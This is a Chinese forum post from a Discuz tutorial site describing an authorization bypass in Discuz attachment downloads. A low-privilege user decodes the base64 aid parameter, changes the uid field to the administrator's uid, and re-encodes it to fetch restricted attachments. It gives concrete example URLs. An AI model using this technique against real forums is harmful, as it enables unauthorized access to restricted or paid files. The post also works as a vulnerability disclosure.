Discuz教程网

1314学习网»站长论坛 discuz资源中心 discuz教程 discuz漏洞 Discuz附件下载权限绕过方法
返回列表 发新帖

Discuz附件下载权限绕过方法

[复制链接]
authicon dly 发表于 2014-3-7 14:06:21 | 显示全部楼层 |阅读模式

越权下载含有“阅读权限”的插件、下载插件免扣币

   重现步骤:

1、使用管理员账户,上传一个有高阅读权限的附件 2、使用低权限的用户账户,下载附件,这个时候,Discuz会提示无权下载 此时,浏览器中的附件地址形如

forum.php?mod=attachment&aid=Nzg4fDQwNGQzYjMxfDEzODk2OTM4Mzh8MzEyNTR8MjY3Mw%3D%3D  

解码aid 788|404d3b31|1389693838|31254|2673   

修改其中的uid部分(这里将uid改成了管理员账户:

1) 788|404d3b31|1389693838|1|2673   编码修改后的aid forum.php?mod=attachment&aid=Nzg4fDQwNGQzYjMxfDEzODk2OTM4Mzh8MXwyNjcz     

此时,成功下载原本需要高权限的附件  

另外下载的同时还可能会刷新用户的最后登录时间(我也因为这个巧合才发现这个漏洞的,因为某些cdn把地址里的base64全部小写了,造成解析错误,解析成了别人的uid,顺便刷新了最后登录时间)



上一篇:Discuz的利用UC_KEY进行getshell
下一篇:Discuz! X3 最新两个存储xss
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

1314学习网 ( 浙ICP备10214163号 )

GMT+8, 2025-5-2 03:58

Powered by Discuz! X3.4

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表